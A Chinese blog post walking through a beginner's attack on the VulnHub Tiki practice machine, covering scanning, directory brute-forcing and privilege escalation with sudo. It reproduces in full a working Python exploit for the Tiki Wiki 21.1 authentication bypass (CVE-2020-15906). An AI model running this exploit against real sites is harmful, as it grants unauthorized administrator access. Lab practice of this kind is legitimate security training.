记一次面向WP的TIKI靶机渗透

于 2024-02-09 08:39:59 发布
阅读量680 收藏 21
点赞数 28
文章标签: web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wyh13123803906/article/details/136084520
版权
本文记录了作者初次进行渗透测试的过程,使用Nmap扫描靶机,发现TikiWikiCMS的AuthenticationBypass漏洞,并通过python脚本利用该漏洞。过程中提到养成使用sudo而非root终端的习惯以及对其他端口如SMB漏洞的观察。
摘要由CSDN通过智能技术生成

寒假闲着无聊就像找个靶机先打起来。

刚入门,所以就先面向wp,熟悉一下渗透测试的整个流程。

这里都是用root终端打的靶,但是看过红队笔记的渗透,说是不要用root终端,还是要养成打sudo的习惯,说是在正式的红蓝攻防里会吃亏,咱们没打过,也不知道吃亏在哪,有机会去问问大佬。

1.信息收集(BTW 基本上所有扫到的信息都要写进md里)

先用nmap扫,确定靶机ip。

扫出来1,2,130,131,254,五个ip。

对比发现是131。

所以靶机地址为:192.168.107.131。

tips:在这里还发现个小问题,就是一开始用VM导入tiki的时候,没有改tiki的网络设置导致一直扫不到这个131地址,还傻傻的因为1这个地址有很多端口开放所以把1当作靶机ip开始下一步.....

ok开始下一步。

在开始之前,先浅浅学习一下nmap的使用。

虫洞:​​​​​​https://blog.csdn.net/qq_37964989/article/details/84330693

用nmap扫描靶机开放端口

这里用-sS,说是又快又安全。

然后-p-扫描全部0-65535全部端口。

这里的最小发包速率--min-rate是红队笔记视频里看来的,说是看过很多nmap的manpage之后得出的一个个人习惯,但是我去看了nmap的国内网的指南,没有看到这个--min-rate的建议,但是看到了这个T4。

所以完整语句是:

sudo nmap -sS -p- --min-rate 10000 T4  IP

扫出来发现这里有四个端口喔。 

最屁股还被看到了攻击机的环境....nmap牛逼。

再基于端口重扫。

22:ssh端口先不用去管它,一般来说是用hydra进行字典爆破的漏洞,然后等下要考,嘿嘿。

然后看到80端口,扫出来有个进去之后发现是个阿帕车的网站。

嘿嘿,看不懂英文,所以我们目录爆破一下。

用的是dirsearch,为什么?

因为花花绿绿的比dirb好看。

ok扫出来两个东西,一个是robots.txt,一个是tiki。

我们访问robots.txt发现也给了一个tiki。

进去看看。

直接看到了一个名为TIKIWIKI的cms(内容管理系统)。

但是也没给我们版本号,wp说版本号一般都在系统的更新日志里面,所以我们继续dir。

发现一个changelog.txt。应该是更新目录。

然后发现最新的版本号是21.1。

那就找找有啥漏洞。

这里用kali自带的searchsploit。

在这之前看一下它的用法。

https://blog.csdn.net/2201_75857562/article/details/128948608

sudo searchsploit Tiki Wiki CMS 21.1

发现有个Authentication Bypass(身份验证绕过)漏洞,有个python脚本可以用。

给它下下来。

cat 48927.py 
# Exploit Title: Tiki Wiki CMS Groupware 21.1 - Authentication Bypass
# Date: 01.08.2020 (1st August 2020)
# Exploit Author: Maximilian Barz aka. Silky
# Vendor Homepage: tiki.org
# Software Link: https://jztkft.dl.sourceforge.net/project/tikiwiki/Tiki_21.x_UY_Scuti/21.1/tiki-21.1.zip
# Version: 21.1
# Tested on: Kali Linux 5.7.0-kali1-amd64

#!/usr/bin/env/python3
import requests
import json
import lxml.html
import sys

banner = '''

████████ ██ ██   ██ ██ ██     ██ ██ ██   ██ ██     ██████   ██    ██ 
   ██    ██ ██  ██  ██ ██     ██ ██ ██  ██  ██          ██ ███   ███ 
   ██    ██ █████   ██ ██  █  ██ ██ █████   ██      █████   ██    ██ 
   ██    ██ ██  ██  ██ ██ ███ ██ ██ ██  ██  ██     ██       ██    ██ 
   ██    ██ ██   ██ ██  ███ ███  ██ ██   ██ ██     ███████  ██ ██ ██ 
                                                                     

 █████  ██    ██ ████████ ██   ██ ███████ ███    ██ ████████ ██  ██████  █████  ████████ ██  ██████  ███    ██         ██████  ██    ██ ██████   █████  ███████ ███████ 
██   ██ ██    ██    ██    ██   ██ ██      ████   ██    ██    ██ ██      ██   ██    ██    ██ ██    ██ ████   ██         ██   ██  ██  ██  ██   ██ ██   ██ ██      ██      
███████ ██    ██    ██    ███████ █████   ██ ██  ██    ██    ██ ██      ███████    ██    ██ ██    ██ ██ ██  ██         ██████    ████   ██████  ███████ ███████ ███████ 
██   ██ ██    ██    ██    ██   ██ ██      ██  ██ ██    ██    ██ ██      ██   ██    ██    ██ ██    ██ ██  ██ ██         ██   ██    ██    ██      ██   ██      ██      ██ 
██   ██  ██████     ██    ██   ██ ███████ ██   ████    ██    ██  ██████ ██   ██    ██    ██  ██████  ██   ████         ██████     ██    ██      ██   ██ ███████ ███████ 
                                                                                                                                                                        
Poof of Concept for CVE-2020-15906 by Maximilian Barz, Twitter: S1lky_1337
'''




def main():
    if(len(sys.argv) < 2):
        print(banner)
        print("Usage: %s <host> " % sys.argv[0])
        print("Eg:    %s 1.2.3.4 " % sys.argv[0])
        return


    rhost = sys.argv[1]
    url = "http://"+rhost+"/tiki/tiki-login.php"

    session = requests.Session()

    def get_ticket():
        r = requests.get(url)
        login_page = r.text.encode('utf-8')
        html = lxml.html.fromstring(login_page)
        auth = html.xpath('//input[@name="ticket"]/@value')

        return str(auth)[2:-2]

    def get_cookie():
        session.get(url)
        return session.cookies.get_dict()


    cookie = get_cookie()
    ticket = get_ticket()

    payload = {'ticket': ticket,'user':'admin', 'pass':'test','login':'','stay_in_ssl_mode_present':'y','stay_in_ssl_mode':'n'}
    headers = {
        'Host': rhost,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzrhost, deflate',
        'Referer': 'http://'+rhost+'/tiki/tiki-login.php',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Content-Length': '125',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
        'Cache-Control': 'max-age=0',
    }


    for i in range(60):
        r = session.post(url, payload, headers)
        if("Account requires administrator approval." in r.text):
            print("Admin Password got removed.")
            print("Use BurpSuite to login into admin without a password ")



if(__name__ == '__main__'):
    main()#

代码审计发现需要一个url,而且它代码自动加入tiki/login.php。

那就运行一下。

发现它移除了管理员登录时的密码。

那我们在网页上尝试登录。

发现密码不能为空。

那咋办,用bp抓包然后修改passwd,直接forward。

进去了。

然后开始漫无目的看里面有啥。

1:这里有个乱码。(百度一下发现是silky的ssh密码.....因为太多人打过这个靶了)

2:这里可能有个文件上传漏洞。(因为只会这个,试过之后发现不行,应该是有过滤)。

3:我自己没找到,wp说这里有个计划任务(兔子洞)。

 用way1测试一下。

 发现进去了。

查看权限发现是3A,那就直接sudo su,进入root,看目录发现有flag.txt,直接cat。

ok,这里其实就到此为止了,只走了80端口一条路,其实反看上面,139,445端口还是有smb漏洞可以利用。

我们来看一下。

返现有三个sharename,这个Notes能看懂。

那就继续看,发现有个Mail.txt,下载下来看一下,发现看到了silky的密码,尝试一下发现能在网页上登上去。

就写到这里吧.... 

是时候做出改变了z
关注
  • 28
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub靶场-Tiki
hxync的博客
08-08 917
靶场下载地址:tiki. 下载之后导入virtualbox启动 不能直接看到IP地址 先看一下kali的ip: Nmap扫一下192.168.1.0/24网段的主机,找到了靶机的IP地址 再扫一下靶机开放的端口: 开放了22 80 139 445 这四个端口 浏览器访问80端口没有发现什么有用的东西 Dirbuster扫一下目录 浏览器访问一下扫到的robots.txt 发现robots.txt文件里也有扫到的tiki目录,访问一下 发现提示是tikiwikicms 再加上下载靶场时有提示是cve漏洞
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Tiki靶机(CMS漏洞)
m0_66299232的博客
11-11 848
5.直接运行后发现,可以结合bp使用admin用户免密登录。2.sudo -l 发现可以执行任意命令,成功拿下!3.searchsploit tiki 查到可利用脚本。攻击机系统:kali linux 2021.1。4.下载下来后,查看是用pytho3写的脚本。6.抓包后把密码删掉,放包 即可成功登录。2.根据提示访问后,发现是一个cms。1.用已知的账号密码进行22端口登录。7.随便点点后,发现一组用户名密码。1.探测目标靶机开放端口和服务。虚拟机网络链接模式:桥接模式。2.用gobuster扫目录。
Tiki靶机 (为CMS漏洞)
m0_60045654的博客
11-14 82
要提前设置好靶机和攻击机(kali)的网卡模式,NAT模式和桥接模式都可以,如果不设置的话,光是扫描靶机IP就会浪费好多好多的时间,而且靶机IP也不一定会有,所以尽量让靶机处于与攻击机同一种网络模式下,我的是处于NAT 模式因为靶机和kali是在同一网络模式下,所以先查看一下kali的IP,一边好找靶机IP1. arp-scan -l 可以快速的扫描ip靶机IP为:10.4.7.1452. 端口扫描。
Vulnhub: Tiki-1靶机
qq_43884092的博客
05-18 167
tiki cms身份验证绕过,sudo提权
靶机6 Tiki
wj33333的博客
10-20 73
arp-scan -l 扫描,查找靶机IPnmap 扫描,查找靶机端口dirsearch 扫描目录查看/robots.txt发现/tiki/目录访问。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Tikiwiki v8.3 beta 多国语言版.zip
07-07
Tiki是一个强大的多语种维基(Wiki)/内容管理(CMS)/群件(Groupware)系统,基于PHP、ADOdb以及smarty开发,你可以使用Tiki来建立和管理你的wiki、文件/图片库、内容管理系统、博客、跟踪/表格、论坛、目录、投票、调查、测验、通讯、日历、常见问题、试算表、地图和工作流等等。
Tikiwiki CMS v13.0.zip
07-07
Tiki Wiki是基于PHP、ADOdb以及smarty开发的CMS(内容管理系统)/门户系统/群件(Groupware)系统。更重要的是Tiki Wiki是一个基于LGPL协议的开源工程,她由来自全世界范围的的开源爱好者、捐赠者参与开发维护的。   通过Tiki Wiki,您可以很轻松的搭建各种类型的站点、门户、内部网等。Tiki Wiki同样也是一个强大的基于Web的协作工具。Tiki Wiki内置了很多功能选项,当您需要某个功能时可以很方便的将该功能激活。Tiki Wiki的设计架构是面向全世界范围的、清爽以及易扩展的。Tiki Wiki除了拥有当前几个优秀的Wiki的所有功能外,并且还提供很多其他很有价值的功能。您可以通过 Tiki Wiki构建成论坛系统、聊天室、投票系统、客户支持网站以及其他。并且您还可以看到,Tiki Wiki开发、维护团队一直处于活跃状态,并将无限期的持续下去。您可以看到有越来越多的网站正基于Tiki Wiki建设当中。   Tiki Wiki的主要功能包括:文章库、论坛、电子报、博客日志、文件/图库系统、投票/调查问卷/测验系统、FAQ、聊天室、广告横幅管理系统、Webmail、行事历、主题控制、工作流、在线支持系统等等……完整的功能了表可以通过访问Tiki功能列表来获取。     相关阅读 同类推荐:博客系统下载
靶机渗透练习11-Tiki
hirak0的博客
04-15 2222
靶机描述 靶机地址:https://www.vulnhub.com/entry/tiki-1,525/ Description Oh no our webserver got compromised. The attacker used an 0day, so we dont know how he got into the admin panel. Investigate that. This is an OSCP Prep Box, its based on a CVE I recently foun
vulnhub-Tiki - 类oscp靶机攻略1
yutianovo的博客
07-14 1231
本文为类oscp靶机打靶1
tiki登录显示服务器繁忙,tikiwiki安装使用中遇到诸多问题。急!急!急!
weixin_42105570的博客
08-06 1193
我在一个Linux服务器上安装了tikiwiki3.1版本,在服务器上装的是XAMPP Linux1.7.2版本。其中,Apache 2.2.12, MySQL 5.1.37, PHP 5.3.0 版本,Linux(Red Hat Enterprise Linux AS release 4 (Nahant Update 6)Kernel 2.6.9-67.ELsmp on an i686),我使用...
Tiki Wiki CMS Groupware 认证绕过漏洞(CVE-2020-15906)
EC_Carrot的博客
08-17 663
漏洞详细 Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, 18.7, 17.3, 16.4前存在一处逻辑错误,管理员账户被爆破60次以上时将被锁定,此时使用空白密码即可以管理员身份登录后台。 漏洞复现 我们使用POC来进行复现,该POC先使用CVE-2020-15906绕过认证,获取管理员权限;再使用Smarty的沙盒绕过漏洞(CVE-2021-26119)
九大PHP开源Wiki(维基百科)程序评测
热门推荐
王以山的专栏
05-02 2万+
维基百科(wiki)是Web2.0的代表产物,跟博客、digg、视频分享等一样同样强调用户参与,分享互联网的精神。如果想自己编写一本百科全书,跟建一个博客一样,有已经开发好的程序可以使用,而且是开源的。有了这些工具,我们要实现编写百科全书的梦想就不难实现了。以下是九大基于PHP和 Mysql架构的wiki程序的介绍,有兴趣的朋友可以选择一款适合自己的wiki程序。 1 PmWiki  下载
好用的几个WIKI
最新发布
qq_41631913的博客
01-05 530
这是一个全功能的开源内容管理系统,包括WIKI、博客、论坛、文件管理等多个功能模块。它具有丰富的社交和协作特性。这是维基百科所使用的软件,是一个功能强大的开源WIKI平台。它具有广泛的社区支持和丰富的插件生态系统。这是一个简单易用的开源WIKI软件,它使用纯文本文件作为存储引擎,无需数据库支持,易于安装和管理。
tiki 中写wiki简单总结
mapoor的专栏
05-09 1877
0       两个空格表示背景突出,用来表示 实例/注释 等,其中内容不会被解析  表示换行 1  '' 两个'包起来表示斜体字  三个表示粗体  四个表示粗斜体 2  == 一个=表示标题最大  六个最小 3  ---- 四个-表示插入一个分割线 4  [] [http://www.thebuggenie.com The Bug Genie website] 表示超链接(外部)  内部
hackbox靶机渗透
10-15
好的,关于hackbox靶机渗透,我可以提供一些基本的信息和建议。首先,hackbox是一个虚拟机靶机,可以用于练习渗透测试技能。在渗透测试过程中,需要进行信息收集、漏洞扫描、漏洞利用等步骤。以下是一些可能有用的工具和技术: 1. Nmap:用于端口扫描和服务识别。 2. Metasploit:用于漏洞利用和后渗透。 3. Hydra:用于暴力破解密码。 4. Burp Suite:用于Web应用程序渗透测试。 5. SQL注入、XSS等常见漏洞的利用方法。 当然,这只是一些基本的工具和技术,实际的渗透测试需要根据具体情况进行选择和使用。此外,还需要注意法律和道德问题,不要进行未经授权的渗透测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值